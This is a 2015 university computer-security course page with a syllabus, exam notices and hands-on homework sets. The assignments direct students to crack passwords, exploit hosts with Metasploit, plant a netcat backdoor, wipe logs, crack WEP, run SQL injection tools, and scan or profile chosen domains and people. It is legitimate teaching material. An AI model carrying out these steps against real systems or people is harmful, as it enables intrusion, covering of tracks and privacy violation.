Instructor:

Prof. Ying-Dar Lin (ydlin@cs.nctu.edu.tw)

TA:

張宏鉦 (changhcs@cs.nctu.edu.tw),

Ekarat (pokekarat@gmail.com),

Tuan (minhtuanthaivn@gmail.com)

汪建廷 (ctwang@cs.nctu.edu.tw)

Introduction to Computer Security, Spring 2015

syllabus, download

TextBook:

Stuart McClure, Joel Scambray, George Kurtz, "Hacking Exposed 7: Network Security

Secrets & Solutions," McGraw-Hill, July 2012.

Reference:

1. Ying-Dar Lin, Ren-Hung Hwang, Fred Baker, “Computer Networks: An Open Source

    Approach,” Chapter 8 Network Security, McGraw-Hill, Feb 2011.

2. William Stallings, “Cryptography and Network Security, 6th edition,” Prentice Hall,

    March 2013.

Slides:

從監聽門事件看資通訊安全演進

Chapter 8 (from the reference book)

Chapter1

Chapter2

Chapter3

Chapter4

Chapter5

Chapter6

Chapter7

Chapter8 (updated)

Chapter9 (updated)

Chapter10 (updated)

Chapter11

Chapter12

Scores:

Announcements:

6/2/2015

Homework #6 Ch9-Ch10 (150 points)
Due: 6/15 (Mon) in the final exam in printed hardcopy
(format: problem, solution with explanation, screen dumps)

1. (60 points) Hacking (a game) ROM
    1) Learn how to hack a game ROM from this link         http://www.nintendoage.com/forum/messageview.cfm?catid=22&threadid=19733
    2) Change 2 PLAYER GAME in menu to 2 Your Name GAME, e.g., I change the 2 PLAYER         GAME to 2 EKARAT GAME. Capture and paste your change.
    * You can download the target game rom (Super Mario Adventure (SMB1 Hack).nes) here.

2. (30 points) Use your Hex editor to modify any programs you want, and tell us
    1) What is the target program?
    2) What is your modification? Show the captured screen of the result.

3. (30 points) Havij
    1) Install Havij.
    2) Explain how to use this tool to crack a database.

4. (30 points) Burp Suite
    1) Install Burp Suite.
    2) Explain how to use this tool.
    3) Using Burp Suite to scan a target, what kind of information can you get?

5/18/2015

Final project report
1. Content (in English or Chinese):
    (1) project title, name, student id,
    (2) abstract (200 words to summarize motivation, methodologies, tools, results, and lessons           learned),
    (3) Motivation and Objective,
    (4) Methodologies,
    (5) Tools,
    (6) Procedures,
    (7) Results,
    (8) Lessons Learned.
    All figures and tables should be numbered and titled such as “Figure 2 Automatic Hacking     Procedure”, “Table 1 Summary and Comparison of Applied Tools”. All references should     be listed at the end and cited in the text such as [3]. Screen dumps are considered as figures     and should be numbered and titled too. Example report formats could be found at     http://speed.cis.nctu.edu.tw/~ydlin/miscPublication.html.

2. Length: 4-6 pages, excluding figures/screen dumps and tables; 8-12 pages, including     figures/screen dumps and tables.

3. DUE: 6/19 (Fri) 2-5PM to 701 EECS (電子資訊研究大樓) in printed hardcopy

5/18/2015

Final exam: 6/15 (Mon) 10:10AM-12:00NN

Form:Open book, but no sharing of hardcopies, no electronic devices

Coverage:Ch5-Ch12

5/12/2015

Homework #5 Ch6-8 (total: 210)
Due: 5/27 (Wed) in midterm in printed hardcopy
(format:problem, solution with explanation, screen dumps)

1. (30 points) Use all of WHOIS, Robtex, and PhishTank to trace back on a phishing email found in your mailbox. If you don’t find one, create one email account and post the email address onto Web to solicit some. Show and discuss your findings.

2. (30 points) On Windows with some running processes connecting to the Internet, use FTK Imager to dump memory and then Volatility Framework to analyze the memory dump. Show processes with connections, and check whether they have DLLs.

3. (30 points) Retrieve Poison Ivy RAT from the Internet. Use a program tracing tool you are familiar with to trace this RAT. Show how you trace the RAT with your tracing tool and summarize what modules this RAT contains.

4. (20 points) Use Nmap, NTA Monitor, IKEProbe to identify whether a target VPN server supports Aggressive mode. Screen dump “useful” results and explain.

5. (20 points) Use SiVuS, SIPVicious to scan a public SIP server. Screen dump “useful” results and explain.

6. (30 points) Setup your own client and an AP, or find an existing AP, running no encryption. Use wireshark or airodump-ng to sniff and decode data frames. Show and discuss your findings.

7. (50 points) Setup your own client and an AP to run WEP. Use the aircrack-ng suite to crack the WEP key by running through the steps of frame capturing, fake authentication attack, ARP replay attack, and key cracking. Show and discuss the steps you run through.

5/12/2015/8/2015

Proposol: 5/27 (Wed) in the class

This one-page proposal should contain:
(1) title of the project, your name and ID,
(2) objective,
(3) methodology,
(4) tools,
(5) expected results.

5/12/2015/8/2015

Homework #4 Ch4 & Ch5 (total: 210)
Due: 5/13 (Wed) in midterm in printed hardcopy
(format:problem, solution with explanation, screen dumps)

1. (60 points) Use Cain to crack passwords on “your” Windows system with the following three different methods supported by Cain.
    a) Brute-force cracking
    b) Dictionary cracking
    c) Rainbow cracking

2. (30 points) Use John the Ripper (JTR) to crack passwords on “your” Linux system.

3. (40 points) Use Metaexploit to exploit a known vulnerability on a server of your choice and on a browser of your choice, respectively.

4. (20 points) After you gain the access of a target host, show how you could install a backdoor program and make it accessible with netcat. You can listen on your host to wait for the backdoor to connect over.

5. (20 points) Compare the vulnerability information that you can collect from three sources: Bugtraq, Open Source Vulnerability Database, Common Vulnerability and Exposures Database. Draw a table to compare them in several features.

6. (20 points) Use find to search the SUID, SGID, and world-writable files on your Linux system.

7. (20 points) Use Logclean-ng to clean the logs created during one login session on your Linux system.

4/8/2015

Homework #3 Ch2 & Ch3 (total: 180)
Due: 4/20 (Mon) in midterm in printed hardcopy
(format:problem, solution with explanation, screen dumps)

1. (50 points) Select a target domain and use Nmap for the following tasks.
    a) host discovery on the selected domain,
    b) port scanning on a selected host,
    c) active stack fingerprinting on the selected host,
    d) version scanning on a selected port,
    e) vulnerability scanning on the selected port.

2. (20 points) List and compare nmap-os-fingerprints used in Nmap and osprints.conf used in Siphon. Discuss how and why they differ.

3. (20 points) List and compare nmap-services and nmap-service-probe. Discuss how and why they differ.

4. (10 points) On a UNIX/Linux host, list /etc/inetd.conf. Discuss what services are being offered.

5. (30 points) Select a target domain, run metaexploit with Nmap scans and import Nmap results into the database. Show found hosts and available ports.

6. (30 points) Select a website to do banner grabbing with telnet, netcat, and grendel-scan, respectively. Show and compare their results.

7. (20 points) Select a target domain to do automatic DNS enumeration by dnsenum to find subdomains, servers, and their IP addresses.

4/7/2015

Midterm: 4/20 (Mon) in the class

Form: Open book (hardcopies only, no electronic devices, no sharing of hardcopies between classmates

Coverage:
- Evolution of ICT Security
- Network Security (ch8 of the reference book)
- ch1 - ch4

3/23/2015

Homework #2(Total: 180)
Due: 4/8 (Wed) in the class in printed hardcopy
Format: problem, solution with explanation, screen dumps

1. (20 points) Select a web site.
    1)Use “Wget” or “Teleport Pro” to mirror the site. Look for comments within comment         tags. Give screen dumps and explain what you found.
    2)Use “DirBuster” with a proxy feature through “privoxy” to enumerate hidden files and         directories. Screen dump and explain the hidden files and directories you found.
2. (20 points) Lookup “How I met your girlfriend” in the BlackHat 2010 demo to explain, in     0.5 page, how this was done.
3. (20 points) Select a person. Use on-line sites for phone book, social network, information,     job, photo management, business directory, jigsaw.com, etc. to summarize, with screen     dumps and explanations, what information you can get. If your target is not in US nor native     English speaker, you might need to use on-line sites different from the textbook.
4. (20 points) Google “XYZ resume firewall” and “XYZ resume intrusion detection” where “XYZ” is the name of your target company. Screen dump “useful” results and explain what     you got.
5. (20 points) Lookup Archive.org and Google cached results, and select a target web site.     Compare the differences between an archived and cached copy with its current on-line     web site. Give screen dump and explain the differences.
6. (20 points) Find Google Hacking Database at hackersforcharity.org/ghdb/. Summarize what     it has and select 3 strings to search. Screen dump and explain what you got.
7. (20 points) Select a web site. Start from whois.iana.org to find its registry, registrar, and     registrant. Also select an IP address. Start from arin.net to find who owns the IP address.     Show your screen dump and explain.
8. (20 points) Select a domain name. Use nslookup to dump its DNS records. Show your screen     dump and explain.
9. (20 points) Select a domain name. Use traceroute or similar tools to find the access path to     that domain. Show your screen dump and explain.
10. (bonus: 40 points) Follow the case study right before chapter 1. Select one target and run     through all tools (Tor, Vidalia, Privoxy, tor-resolve, proxychains, Nmap, socat, nc). Screen     dump the process and explain what you got in your screen.

3/17/2015

Homework #1 (ch8 in Computer Networks)
Hands-on: 2, 4, 7
Written: 4, 11, 14
Due: 3/25 (Wed) in the class, in printed hardcopy